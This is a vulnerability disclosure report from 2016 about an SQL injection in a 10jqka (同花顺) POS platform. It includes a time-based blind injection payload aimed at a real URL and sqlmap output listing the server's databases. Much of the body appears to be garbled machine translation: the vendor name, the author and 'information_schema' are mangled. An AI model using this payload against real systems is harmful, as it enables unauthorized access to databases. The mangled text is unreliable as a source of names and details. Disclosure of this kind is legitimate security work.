漏洞标题 同花顺某平台存在SQL注入 相关厂商 同花顺 漏洞作者 路人甲 提交时间 2016-04-25 09:36 公开时间 2016-06-09 09:40 漏洞类型 SQL注射漏洞 危害等级 高…
漏洞标题
SQL注入存在于同一刷新的平台中
相关制造商
直冲
漏洞作者
过路人
提交时间
2016-04-25 09: 36
公共时间
2016-06-09 09: 40
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
Php +字符型注射
漏洞详细信息
http://pos.10jqka.com.cn/center/center/myupload/uploaderid/235070423
延迟

没有延迟

漏洞证明:
Sqlmap从存储的会话:恢复以下注入点
---
参数:#1 *(URI)
输入:和/或基于时间的盲
标题: MySQL>=5.0.12 AND基于时间的盲(SELECT)
有效载荷:http://pos.10jqka.com.cn: 80/center/center/myupload/uploaderid/235070423'AND(SELECT * FROM(SELECT(SLEEP(5)))rgZl)和'5652'='5652 /
---
[11: 42: 50] [INFO]后端DBMS是MySQL
后端DBMS: MySQL 5.0.12
[11: 42: 50] [INFO]获取数据库名称
[11: 42: 50] [INFO]获取数据库数量
[11: 42: 50] [警告]基于时间的比较需要更大的统计模型,请稍候........
[11: 42: 55] [警告]在使用基于时间的有效负载期间不要强调网络适配器以防止潜在错误非常重要
您是否希望sqlmap尝试优化DBMS延迟响应的值(选项'--time-sec')? [是/否] y
[11: 43: 28] [INFO]由于响应时间良好,将时间延迟调整为1秒
3
[11: 43: 28] [INFO]检索到:通知
[11: 44: 36] [ERROR]检测到无效字符。重试.
[11: 44: 36] [警告]将时间延迟增加到2秒
Ation_schema
[11: 47: 59] [INFO]检索到:位置
[11: 49: 05] [INFO]检索到:测试
可用的数据库[3]:
[*] information_schema
[*] pos
[*]测试
修理计划:
版权声明:请注明出处。居民A @乌云